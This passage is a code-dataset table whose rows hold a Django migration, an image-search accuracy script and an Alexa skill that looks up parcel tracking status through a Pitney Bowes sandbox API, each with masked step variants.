code (string, lengths 13 to 1.2M) | order_type (string, 1 class) | original_example (dict) | step_ids (list, lengths 1 to 5) |
---|---|---|---|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courses', '0015_auto_20151216_1136'),
]
operations = [
migrations.AlterField(
model_name='duration',
name='duration',
field=models.DecimalField(default=60, verbose_name='duration', max_digits=10, decimal_places=0),
),
]
|
normal
|
{
"blob_id": "0cba18ca7126dda548a09f34dc26b83d6471bf68",
"index": 1652,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('courses', '0015_auto_20151216_1136')]\n operations = [migrations.AlterField(model_name='duration', name=\n 'duration', field=models.DecimalField(default=60, verbose_name=\n 'duration', max_digits=10, decimal_places=0))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('courses', '0015_auto_20151216_1136')]\n operations = [migrations.AlterField(model_name='duration', name=\n 'duration', field=models.DecimalField(default=60, verbose_name=\n 'duration', max_digits=10, decimal_places=0))]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('courses', '0015_auto_20151216_1136'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='duration',\n name='duration',\n field=models.DecimalField(default=60, verbose_name='duration', max_digits=10, decimal_places=0),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
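The first row's code is an auto-generated Django migration that alters the `duration` field on the `Duration` model in the `courses` app. As a point of reference, the model state it converges on looks roughly like the sketch below; the model name and the DecimalField arguments come from the migration itself, while the surrounding class body and any other fields are assumptions.

```python
# Hypothetical sketch of the model this AlterField migration targets.
# Only the field arguments are grounded in the migration above; the rest
# of the class is assumed for illustration.
from django.db import models


class Duration(models.Model):
    duration = models.DecimalField(
        default=60,
        verbose_name='duration',
        max_digits=10,
        decimal_places=0,
    )
```

In a working project this migration would typically be applied with `python manage.py migrate courses`.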
# -*- coding: utf-8 -*-
import json
import argparse
def parse_args():
"""
Parse input arguments.
:return:
"""
parser = argparse.ArgumentParser(description='以图搜图API测试')
parser.add_argument('--ak', dest='access_key', help='access_key for qiniu account',
type=str)
parser.add_argument('--sk', dest='secret_key', help='secret_key for qiniu account',
type=str)
parser.add_argument('--in', dest='json_file', help='json file',
type=str)
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
file = open(args.json_file,'r')
res = []
a = 0
for line in file.readlines():
dic = json.loads(line)
img_url = dic["url"]
t = {"url": img_url, "true":0, "simialr_uri":[]}
if not "error" in dic.keys():
a += 1
#im_num = img_url.split('.')[-2].split('/')[-1].lstrip('image_group_test_')
im_num = img_url.split('.')[-2].split('/')[-1]#.lstrip('image_group_test_')
print(im_num)
for i in dic["result"]:
uri = []
#print((i["uri"].split('/'))[4].split('__')[0]=="eval",(i["uri"].split('/'))[4].split('-')[0])
print((i["uri"].split('/'))[4])
if ((i["uri"].split('/'))[4].split('__')[0]=="eval") and (im_num in (i["uri"].split('/'))[4].split('-')[0]):
t["simialr_uri"].append(i)
t["true"] += 1
res.append(t)
r = 0
for i in range(a):
r += res[i]["true"]
correct = r/(float(a)*15)
print ("The top-5 correct percentage is %f" % correct)
|
normal
|
{
"blob_id": "c7147741784b37b42200869002d4df5ddc900675",
"index": 2001,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments.\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description='以图搜图API测试')\n parser.add_argument('--ak', dest='access_key', help=\n 'access_key for qiniu account', type=str)\n parser.add_argument('--sk', dest='secret_key', help=\n 'secret_key for qiniu account', type=str)\n parser.add_argument('--in', dest='json_file', help='json file', type=str)\n return parser.parse_args()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments.\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description='以图搜图API测试')\n parser.add_argument('--ak', dest='access_key', help=\n 'access_key for qiniu account', type=str)\n parser.add_argument('--sk', dest='secret_key', help=\n 'secret_key for qiniu account', type=str)\n parser.add_argument('--in', dest='json_file', help='json file', type=str)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n file = open(args.json_file, 'r')\n res = []\n a = 0\n for line in file.readlines():\n dic = json.loads(line)\n img_url = dic['url']\n t = {'url': img_url, 'true': 0, 'simialr_uri': []}\n if not 'error' in dic.keys():\n a += 1\n im_num = img_url.split('.')[-2].split('/')[-1]\n print(im_num)\n for i in dic['result']:\n uri = []\n print(i['uri'].split('/')[4])\n if i['uri'].split('/')[4].split('__')[0\n ] == 'eval' and im_num in i['uri'].split('/')[4].split('-'\n )[0]:\n t['simialr_uri'].append(i)\n t['true'] += 1\n res.append(t)\n r = 0\n for i in range(a):\n r += res[i]['true']\n correct = r / (float(a) * 15)\n print('The top-5 correct percentage is %f' % correct)\n",
"step-4": "import json\nimport argparse\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments.\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description='以图搜图API测试')\n parser.add_argument('--ak', dest='access_key', help=\n 'access_key for qiniu account', type=str)\n parser.add_argument('--sk', dest='secret_key', help=\n 'secret_key for qiniu account', type=str)\n parser.add_argument('--in', dest='json_file', help='json file', type=str)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n file = open(args.json_file, 'r')\n res = []\n a = 0\n for line in file.readlines():\n dic = json.loads(line)\n img_url = dic['url']\n t = {'url': img_url, 'true': 0, 'simialr_uri': []}\n if not 'error' in dic.keys():\n a += 1\n im_num = img_url.split('.')[-2].split('/')[-1]\n print(im_num)\n for i in dic['result']:\n uri = []\n print(i['uri'].split('/')[4])\n if i['uri'].split('/')[4].split('__')[0\n ] == 'eval' and im_num in i['uri'].split('/')[4].split('-'\n )[0]:\n t['simialr_uri'].append(i)\n t['true'] += 1\n res.append(t)\n r = 0\n for i in range(a):\n r += res[i]['true']\n correct = r / (float(a) * 15)\n print('The top-5 correct percentage is %f' % correct)\n",
"step-5": "# -*- coding: utf-8 -*-\nimport json\nimport argparse\n\ndef parse_args():\n \"\"\"\n Parse input arguments.\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description='以图搜图API测试')\n parser.add_argument('--ak', dest='access_key', help='access_key for qiniu account',\n type=str)\n\n parser.add_argument('--sk', dest='secret_key', help='secret_key for qiniu account',\n type=str)\n\n parser.add_argument('--in', dest='json_file', help='json file',\n type=str)\n\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n file = open(args.json_file,'r')\n res = []\n a = 0\n\n for line in file.readlines():\n dic = json.loads(line)\n img_url = dic[\"url\"]\n t = {\"url\": img_url, \"true\":0, \"simialr_uri\":[]}\n if not \"error\" in dic.keys():\n a += 1\n #im_num = img_url.split('.')[-2].split('/')[-1].lstrip('image_group_test_')\n im_num = img_url.split('.')[-2].split('/')[-1]#.lstrip('image_group_test_')\n print(im_num)\n for i in dic[\"result\"]:\n uri = []\n #print((i[\"uri\"].split('/'))[4].split('__')[0]==\"eval\",(i[\"uri\"].split('/'))[4].split('-')[0])\n print((i[\"uri\"].split('/'))[4])\n if ((i[\"uri\"].split('/'))[4].split('__')[0]==\"eval\") and (im_num in (i[\"uri\"].split('/'))[4].split('-')[0]):\n t[\"simialr_uri\"].append(i)\n t[\"true\"] += 1\n res.append(t)\n\n r = 0\n for i in range(a):\n r += res[i][\"true\"]\n\n correct = r/(float(a)*15)\n print (\"The top-5 correct percentage is %f\" % correct)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
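The second row's script reads a results file with one JSON object per line and counts, per query image, how many returned uris point back to the same image number; note that the `--ak`/`--sk` options are parsed but never used by the script. Below is a fabricated, self-contained illustration of the matching logic: the key names and split indices come from the script, while the URL and uri layouts are assumptions chosen only so those indices line up.

```python
import json

# Fabricated example of one input line, shaped after the fields the script
# reads (url, result[*].uri); the URL and uri layouts here are assumptions.
line = json.dumps({
    "url": "http://cdn.example.com/images/42.jpg",
    "result": [{"uri": "http://host.example.com/data/eval__42_group-0001/42_1.jpg"}],
})

dic = json.loads(line)
im_num = dic["url"].split('.')[-2].split('/')[-1]  # -> '42'
hits = 0
for item in dic["result"]:
    segment = item["uri"].split('/')[4]            # -> 'eval__42_group-0001'
    if segment.split('__')[0] == "eval" and im_num in segment.split('-')[0]:
        hits += 1
print(hits)  # prints 1 for this fabricated line
```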
"""
Code for Alexa skill to check PB tracking
"""
from __future__ import print_function
import traceback
import requests
import os
import json
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'card': {
'type': 'Simple',
'title': "SessionSpeechlet - " + title,
'content': "SessionSpeechlet - " + output
},
'reprompt': {
'outputSpeech': {
'type': 'PlainText',
'text': reprompt_text
}
},
'shouldEndSession': should_end_session
}
def build_response(session_attributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': session_attributes,
'response': speechlet_response
}
# --------------- Functions that control the skill's behavior ------------------
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = "Welcome to PB Parcel Tracker"
speech_output = "Please give first 10 digits of tracking number"
# If the user either does not reply to the welcome message or says something
# that is not understood, they will be prompted again with this text.
reprompt_text = "Please give first 10 digits of tracking number"
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you for trying the Alexa Skills Kit sample. " \
"Have a nice day! "
# Setting this to true ends the session and exits the skill.
should_end_session = True
return build_response({}, build_speechlet_response(
card_title, speech_output, None, should_end_session))
#----- get tracking ------
def setFirstEleven(intent, session):
session_attributes = {}
should_end_session = False
speech_output = "Now give remaining digits"
reprompt_text = "Now give the next eleven numbers"
try:
tracking_number_1 = intent['slots']['One']['value']
tracking_number_2 = intent['slots']['Two']['value']
tracking_number_3 = intent['slots']['Three']['value']
tracking_number_4 = intent['slots']['Four']['value']
tracking_number_5 = intent['slots']['Five']['value']
tracking_number_6 = intent['slots']['Six']['value']
tracking_number_7 = intent['slots']['Seven']['value']
tracking_number_8 = intent['slots']['Eight']['value']
tracking_number_9 = intent['slots']['Nine']['value']
tracking_number_10 = intent['slots']['Ten']['value']
first_ten = "%s%s%s%s%s%s%s%s%s%s" % (tracking_number_1, tracking_number_2,tracking_number_3, tracking_number_4,tracking_number_5, tracking_number_6,tracking_number_7, tracking_number_8,tracking_number_9, tracking_number_10)
session_attributes['first_ten'] = first_ten
print("session after adding first ten--->")
print(session_attributes)
except Exception as app_exception:
traceback.print_tb
speech_output = "There was some problem, Please provide first ten digits of the tracking number"
reprompt_text = "Please say first ten digits of the tracking number"
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
#----- get tracking ------
def getParcelStatus(intent, session):
session_attributes = {}
should_end_session = True
speech_output = "There was some problem in taking your input"
reprompt_text = "Please say remaining digits of the tracking number"
try:
tracking_number_11= intent['slots']['Eleven']['value']
tracking_number_12 = intent['slots']['Twelve']['value']
tracking_number_13 = intent['slots']['Thirteen']['value']
tracking_number_14 = intent['slots']['Fourteen']['value']
tracking_number_15 = intent['slots']['Fifteen']['value']
tracking_number_16 = intent['slots']['Sixteen']['value']
tracking_number_17 = intent['slots']['Seventeen']['value']
tracking_number_18 = intent['slots']['Eighteen']['value']
tracking_number_19 = intent['slots']['Nineteen']['value']
tracking_number_20 = intent['slots']['Twenty']['value']
tracking_number_21 = intent['slots']['TwentyOne']['value']
tracking_number_22 = intent['slots']['TwentyTwo']['value']
tracking_number = "%s%s%s%s%s%s%s%s%s%s%s%s" % (tracking_number_11,tracking_number_12, tracking_number_13, tracking_number_14,tracking_number_15, tracking_number_16,tracking_number_17, tracking_number_18,tracking_number_19, tracking_number_20,tracking_number_21, tracking_number_22)
print("'first_ten' not in session['attributes']--->")
print('first_ten' not in session['attributes'])
full_tracking_number = "%s%s" % (session['attributes']['first_ten'], tracking_number)
bearer = "Bearer %s" % (session['access_token'])
print("USPS FULL Tracking Number ----> %s" % (full_tracking_number))
url = "https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS" %(full_tracking_number)
r=requests.get(url, headers={"Authorization" : bearer})
tracking_response = {}
tracking_response = json.loads(r.content)
if(r.status_code == 200):
speech_output = "The status of the parcel is "+tracking_response['status']
reprompt_text = "The status of the parcel is "+tracking_response['status']
else:
speech_output = tracking_response['errors'][0]['errorDescription']
reprompt_text = tracking_response['errors'][0]['errorDescription']
print(r.content)
except Exception as app_exception:
traceback.print_tb
should_end_session = False
if ('attributes' not in session or ('attributes' in session and 'first_ten' not in session['attributes'])):
speech_output = "Please provide only first ten digits of the tracking number"
reprompt_text = "Please provide only first ten digits of the tracking number"
else:
speech_output = "There was some problem, Please say remaining digits of the tracking number"
reprompt_text = "Please say remaining digits of the tracking number"
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
""" Called when the session starts """
print("on_session_started requestId=" + session_started_request['requestId']
+ ", sessionId=" + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print("on_launch requestId=" + launch_request['requestId'] +
", sessionId=" + session['sessionId'])
# Dispatch to your skill's launch
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = "Basic "+access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={"Authorization": access_key_value,
"Content-Type": "application/x-www-form-urlencoded"},
data={"grant_type": "client_credentials"})
print(r.status_code)
if(r.status_code == 200):
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print("on_intent requestId=" + intent_request['requestId'] +
", sessionId=" + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if('access_token' not in session):
oauth_request(session)
print(session['access_token'])
# Dispatch to your skill's intent handlers
if intent_name == "Tracking":
return setFirstEleven(intent, session)
elif intent_name == "TrackingSecond":
return getParcelStatus(intent, session)
elif intent_name == "AMAZON.HelpIntent":
return get_welcome_response()
elif intent_name == "AMAZON.CancelIntent" or intent_name == "AMAZON.StopIntent":
return handle_session_end_request()
else:
raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print("on_session_ended requestId=" + session_ended_request['requestId'] +
", sessionId=" + session['sessionId'])
# add cleanup logic here
# --------------- Main handler ------------------
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print("event.session.application.applicationId=" +
event['session']['application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
# if (event['session']['application']['applicationId'] !=
# "amzn1.echo-sdk-ams.app.[unique-value-here]"):
# raise ValueError("Invalid Application ID")
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == "LaunchRequest":
return on_launch(event['request'], event['session'])
elif event['request']['type'] == "IntentRequest":
return on_intent(event['request'], event['session'])
elif event['request']['type'] == "SessionEndedRequest":
return on_session_ended(event['request'], event['session'])
|
normal
|
{
"blob_id": "a5ef2adbf85b5ab80c59697340f94bc57d60952e",
"index": 4463,
"step-1": "<mask token>\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\n<mask token>\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) 
The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-2": "<mask token>\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\n<mask token>\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide 
only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-3": "<mask token>\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':\n {'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output}, 'reprompt': {\n 'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},\n 'shouldEndSession': should_end_session}\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = 'Now give remaining digits'\n reprompt_text = 'Now give the next eleven numbers'\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,\n tracking_number_2, tracking_number_3, tracking_number_4,\n tracking_number_5, tracking_number_6, tracking_number_7,\n tracking_number_8, tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print('session after adding first ten--->')\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = (\n 'There was some problem, Please provide first ten digits of the tracking number'\n )\n reprompt_text = 'Please say first ten digits of the tracking number'\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = 
intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef 